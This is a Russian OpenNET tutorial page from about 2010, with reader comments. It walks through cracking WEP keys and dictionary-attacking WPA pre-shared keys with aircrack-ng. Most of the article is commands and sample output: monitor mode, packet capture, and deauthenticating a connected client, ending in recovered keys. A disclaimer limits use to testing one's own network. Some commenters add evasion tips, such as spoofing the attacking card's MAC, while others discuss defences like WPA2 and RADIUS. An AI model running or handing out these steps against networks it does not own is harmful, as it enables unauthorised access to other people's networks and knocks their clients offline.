The OpenNET Project / Index page

[ новости/++ | форум | wiki | теги ]

Перехват WEP и WPA ключей в беспроводной сети при помощи AIR Crack
Инструкция по подбору ключей шифрования в беспроводных сетях, базирующихся на
механизме WEP, являющемся устаревшим, но продолжающем широко использоваться.
Данная информация предназначена только для ознакомления и может быть
использована исключительно в целях проверки надежности собственной сетевой инфраструктуры.

Устанавливаем пакет AIR Crack.
В Debian/Ubuntu:

   $ sudo apt-get install aircrack-ng

В Fedora/CentOS/RHEL:

   $ sudo yum -y install aircrack-ng

Определяем сетевой интерфейс, привязанный к беспроводной карте:
2. Identify wireless network interface

   $ /sbin/iwconfig

   wlan0     IEEE 802.11  Mode:Monitor  Frequency:2.437 GHz  Tx-Power=20 dBm

Активируем режим мониторинга:

   $ sudo airmon-ng start wlan0

   Interface       Chipset         Driver
   wlan0                   rtl8180 - [phy0]
   (monitor mode enabled on mon0)

Определяем BSSID-идентификатор сети:

   $ sudo airodump-ng wlan0

   BASE:
   BSSID : 00:0F:B5:FD:FB:C2
   Channel: 6
   STATION:
   MAC: 00:13:04:30:FA:EC

Для успешного проведения атаки к точке доступа должна быть подключена хотя бы
одна активная машина, чем больше трафик у которой, тем быстрее будет подобран ключ.

Включаем режим снифинга и накапливаем статистику. Чем длиннее WEP-ключ тем
больше пакетов необходимо перехватить (64-битный ключ требует накопления
примерно 6000 пакетов):

   $ sudo airodump-ng -c 6 --bssid 00:0F:B5:FD:FB:C2 -w data-capture wlan0

где, "-c 6" - номер канала беспроводной точки доступа (см. вывод airodump-ng
wlan0). В опции --bssid указан идентификатор точки доступа, для отсеивания
лишнего трафика. Все перехваченные пакеты будут сохранены в файле data-capture-01.cap.

После накопления достаточного объема статистики подбираем WEP-ключ (выполняем
операцию не прерывая процесс снифинга, так как числа перехваченных пакетов
может не хватить):

   $ sudo aircrack-ng -z data-capture-01.cap

   Opening data-capture-01.cap
   Read 450 packets.

   #  BSSID              ESSID                     Encryption
   1  00:11:95:35:FD:12  test1                WEP (210 IVs)
   2  00:17:3F:62:2E:50  test2                None (0.0.0.0)

    Index number of target network ? 1

   [00:00:21] Tested 485 keys (got 17690 IVs)

   KB    depth   byte(vote)
    0    9/ 13   00(20993) 06(20737) 27(20736) 3F(20736) A2(20736)
    1    0/  1   F3(28417) A8(23298) 34(21248) 57(21248) A3(21248)
    2    0/  2   8E(25857) BC(23809) 3F(23040) D2(22784) 69(21504)
    3    0/  5   6E(24321) 35(2259) 5A(22016) 95(22016) B8(22016)
    4    3/  4   98(21505) 7C(20993) 84(20992) E0(20992) F0(20992)

   KEY FOUND! [ 1F:F3:6E:6A:98 ]
   Decrypted correctly: 100%

На выходе получили искомый ключ "1F:F3:6E:6A:98".


Подбор простого словарного pre-shared WPA-ключа.

Похожим образом осуществляется подбор WPA-ключа, только для успешного
завершения подбора требуется значительно больше времени и определенное везение.

После запуска  airodump-ng дожидаемся соединения клиента к сети:

   CH  6 ][ Elapsed: 4 s ][ 2007-03-24 16:58 ][ WPA handshake: 00:14:6C:7E:40:80
   ...
    BSSID              STATION            PWR  Lost  Packets  Probes                                             
    00:14:6C:7E:40:80  00:0F:B5:FD:FB:C2   35     0      116  

После чего инициируем деаутентификацию клиента:

   $ sudo aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 ath0

   11:09:28  Sending DeAuth to station   -- STMAC: [00:0F:B5:34:30:30]

где, 1 - число отправленных deauth-пакетов, 00:14:6C:7E:40:80 - MAC точки
доступа, 00:0F:B5:FD:FB:C2  - MAC клиента.

Запускаем процесс подбора ключевой фразы по словарю password.lst.

   $ aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 data-capture-01.cap

В случае успеха получаем примерно следующее:
 
   BSSID              ESSID                     Encryption
    1  00:14:6C:7E:40:80  teddy                     WPA (1 handshake)
   
   Choosing first network as target.
   ...
   [00:00:00] 2 keys tested (37.20 k/s)
   KEY FOUND! [ 12345678 ]
 
   Master Key     : CD 69 ...
   Transcient Key : 06 F8 ... 
   EAPOL HMAC     : 4E 27 ...
 
Ключи: wep, wifi, security, aircrack / Лицензия: CC-BY
Раздел:    Корень / Безопасность / Шифрование, PGP

Обсуждение [ Линейный режим | Показать все | RSS ]
 
  • 1.1, pavel_simple, 13:28, 11/09/2010 [ответить] [смотреть все]
  • +/
    ребята я конечно всё понимаю -- но подобные мануалы, в который в самом начале не сказано что "данная информация предназначена _только_ для ознакомления и может быть использованна _исключительно_ в целях проверки собственной сетевой инфраструктуры" могут быть истолкованы в рамках вполне конкретной статьи УК РФ. !!!WARNING!!!
     
  • 1.2, mega4el, 14:53, 11/09/2010 [ответить] [смотреть все]
  • +/
    Может кто подскажет как попроще сделать загрузочную флешку с подобными инструментами на борту?
     
  • 1.5, аноним, 23:17, 11/09/2010 [ответить] [смотреть все]
  • +/
    Мануалы по взлому вай-файя плодятся уже 10 лет подряд. Вековой баян. Называется, "для тех, кто без гугла" или "самым одаренным от самых одаренных ".
     
  • 1.6, QuAzI, 09:48, 12/09/2010 [ответить] [смотреть все]
  • +/
    А методы защиты слабо написать?
     
     
  • 2.7, анонимус, 12:30, 12/09/2010 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    использовать WPA2
     
     
  • 3.11, daevy, 10:20, 13/09/2010 [^] [ответить] [смотреть все]  
  • +/
    не панацея.
    нужны radius, kerberos.
     
     
  • 4.14, _Bulgarin, 21:23, 13/09/2010 [^] [ответить] [смотреть все]  
  • +/
    угу, и сисадмина застрелить сразу...
     
     
  • 5.28, kde, 17:33, 24/09/2010 [^] [ответить] [смотреть все]  
  • +/
    нафига EAP-TLS с привязкой к мак адресу и нач отдела кадров на выдачу ключе... весь текст скрыт [показать]
     
  • 2.15, pavlinux, 23:58, 13/09/2010 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    WPA2
    PSK = "4My$uPpErP@$$\/\/0rD|"
     
  • 1.8, xa2rd, 14:06, 12/09/2010 [ответить] [смотреть все]  
  • +/
    Странно видеть подобную статью на опеннете. Про этот метод только очень ленивые не писали.
     
  • 1.9, Deam, 16:51, 12/09/2010 [ответить] [смотреть все]  
  • +/
    Прочитал заголовок, думал, что что-то новое. А оказалось всё старое. N900 WEP как орешки раскалывает.
     
  • 1.12, netc, 12:08, 13/09/2010 [ответить] [смотреть все]  
  • +1 +/
    я конечно дико извиняюсь, но ИМХО статьи на opennet - не хватало, по причине того что на opennet - очень приятно читать и скать любую информацию, да не смотря на то что есть google - opennet - это не только статья как таковая а еще и полезные комментарии.
     
     
  • 2.13, Meddina, 14:18, 13/09/2010 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    Поддерживаю! порой комментарии бывают содержательней, чем сама статья!
     
  • 1.16, Харон, 13:23, 14/09/2010 [ответить] [смотреть все]  
  • +/
    ИМХО, немешает добавить пункт со сменой МАК-адреса атакующей карточки перед началом атаки ;)
     
     
  • 2.18, Nas_tradamus, 18:16, 16/09/2010 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    Cкажите, в статье есть строки Определяем BSSID-идентификатор сети sudo a... весь текст скрыт [показать] [показать ветку]
     
     
  • 3.19, artickl, 18:57, 17/09/2010 [^] [ответить] [смотреть все]  
  • +1 +/
    я использую простой скрипт iwlist wlan0 scanning 124 grep -e ESSID -e Encrypt... весь текст скрыт [показать]
     
     
  • 4.20, artickl, 19:00, 17/09/2010 [^] [ответить] [смотреть все]  
  • +/
    ну или просто wlist wlan0 scan и ручками просмотреть где стоит Encryption on н... весь текст скрыт [показать]
     
     
  • 5.21, Nas_tradamus, 20:42, 17/09/2010 [^] [ответить] [смотреть все]  
  • +/
    Спасибо Не знал про wlist Надо бы написать для Maemo скриптец для взлома сети ... весь текст скрыт [показать]
     
  • 1.22, Вася Пупкин, 00:27, 18/09/2010 [ответить] [смотреть все]  
  • +/
    капец, ломатели, неужели кто-то еще юзает WPA и WEP.
    Либо просто открытая сетка, либо WPA2 и все эти древние мануалы идут лесом.
     
     
  • 2.29, zazik, 10:50, 05/10/2010 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    Используют. Некоторые мобильные устройства WPA2 не понимают, только WPA.
     
  • 1.23, linux_must_die, 04:43, 18/09/2010 [ответить] [смотреть все]  
  • +/
    да запросто: dir-300 по дефолту стоит WPA/WEP или вообще без шифрования. и так почти везде
     
  • 1.24, Аноним, 11:57, 19/09/2010 [ответить] [смотреть все]  
  • +/
    Да и брутфорс по словарю актуален действительно только при пароле вроде 1234567... весь текст скрыт [показать]
     
     
  • 2.25, Nas_tradamus, 14:35, 19/09/2010 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    В статье не сказано, что нужно ловить "#Data" пакеты, а не простые. Во вторых, не сказано как нагонять эти пакеты (рукопожатие и т. д.) обеими способами.

    Я долго не мог понять почему у меня aircrack-ng пишет "Got no data packets from target network!". Эта статья сбила меня. :)

    В общем, ловить data-пакеты WEP можно очень долго и нудно. Я вот за час не поймал ни одного пакета, хотя вокруг меня 4 WEP-точки.

    Может дело в N900... не знаю.

     
  • 2.31, Аноним, 18:53, 25/10/2013 [^] [ответить] [смотреть все] [показать ветку]  
  • +/
    я установил =)
     
  • 1.27, Аноним, 16:16, 21/09/2010 [ответить] [смотреть все]  
  • +/
    странно, но aurodump-ng выдаёт сверху следующее fixed channel mode -1 как то ... весь текст скрыт [показать]
     
  • 1.30, leo, 21:31, 20/12/2010 [ответить] [смотреть все]  
  • +/
    новичок
     

    Ваш комментарий
    Имя:         
    E-Mail:      
    Заголовок:
    Текст:



      Закладки на сайте
      Проследить за страницей
    Created 1996-2017 by Maxim Chirkov  
    ДобавитьРекламаВебмастеруГИД  
    Hosting by Ihor